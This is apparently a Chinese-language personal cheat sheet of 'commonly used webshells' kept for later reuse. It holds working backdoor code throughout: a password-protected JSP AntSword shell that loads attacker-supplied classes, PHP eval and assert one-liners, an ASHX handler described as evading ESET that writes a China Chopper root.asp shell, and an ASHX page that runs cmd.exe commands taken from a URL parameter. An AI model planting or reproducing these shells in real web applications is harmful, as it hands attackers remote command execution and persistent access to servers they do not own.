快捷笔记笔记常用webshell
Sircong：一些常用的webshell，记录下来，避免有时候找不着。
JSP
jsp一句话打印输出验证
| <%out.println("i am sircong");%>
<%out.println(“i am sircong”);%>
<%out.println("i am sircong");%>
jsp蚁剑马,密码:passwd
| $<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } }
public byte[] base64Decode(String str) throws Exception { try { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } } %> <% String cls = request.getParameter("passwd"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } %>
PHP
基础一句话
| <?php eval(@$_POST['ST']);?>
| `` code <?php @assert($_POST['pass']);?>
ASP
ashx文件后缀,免杀eset,上传ashx马后,访问ashx马,会在webshell当前目录生成一个root.asp文件,使用菜刀连接root.asp,密码:root
| <%@ WebHandler Language="C#" class="Handler" %>
using System; using System.Web; using System.IO; public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); file1.Write("<%response.clear:execute request(\"root\"):response.End%>"); file1.Flush(); file1.Close();
}
public bool IsReusable { get { return false; } }
}
ashx文件后缀,浏览器访问上传地址执行cmd命令
| <% @ webhandler language="C#" class="AverageHandler" %> using System; using System.Web; using System.Diagnostics; using System.IO;
public class AverageHandler : IHttpHandler { /* .Net requires this to be implemented */ public bool IsReusable { get { return true; } }
/* main executing code */ public void ProcessRequest(HttpContext ctx) { Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl); string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");
ctx.Response.Write("<form method='GET'>Command: <input name='cmd' value='"+command+"'><input type='submit' value='Run'>"); ctx.Response.Write("<hr>"); ctx.Response.Write("<pre>");
/* command execution and output retrieval */ ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c "+command; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close();
ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s)); ctx.Response.Write("</pre>"); ctx.Response.Write("<hr>"); ctx.Response.Write("By < a href=' '>@Hypn, for educational purposes only."); } }